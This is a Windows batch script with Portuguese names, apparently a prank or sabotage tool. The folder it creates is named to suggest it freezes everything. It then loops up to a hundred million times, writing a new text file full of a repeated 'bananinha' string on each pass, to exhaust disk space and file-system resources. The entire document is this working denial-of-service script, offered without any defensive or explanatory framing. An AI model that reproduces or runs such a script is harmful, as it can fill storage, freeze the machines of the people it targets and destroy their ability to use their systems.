set "pasta=BananaTravaTudo"
mkdir "%pasta%"
for /l %%x in (1, 1, 100000000) do (
    echo bananinhaBananinhaBananinhabananinhaBananinhaBananinhabananinhaBananinhaBananinhabananinhaBananinhaBananinhabananinhaBananinhaBananinhabananinhaBananinhaBananinhabananinhaBananinhaBananinhabananinhaBananinhaBananinhabananinhaBananinhaBananinhabananinhaBananinhaBananinhabananinhaBananinhaBananinhabananinhaBananinhaBananinhabananinhaBananinhaBananinhabananinhaBananinhaBananinhabananinhaBananinhaBananinhabananinhaBananinhaBananinhabananinhaBananinhaBananinhabananinhaBananinhaBananinhabananinhaBananinhaBananinhabananinhaBananinhaBananinhabananinhaBananinhaBananinhabananinhaBananinhaBananinhabananinhaBananinhaBananinhabananinhaBananinhaBananinhabananinhaBananinhaBananinhabananinhaBananinhaBananinhabananinhaBananinhaBananinhabananinhaBananinhaBananinhabananinhaBananinhaBananinhabananinhaBananinhaBananinha %%x > "%pasta%\BananinhaAR%%x.txt"
)
echo Os arquivos foram criados na pasta "%pasta%"
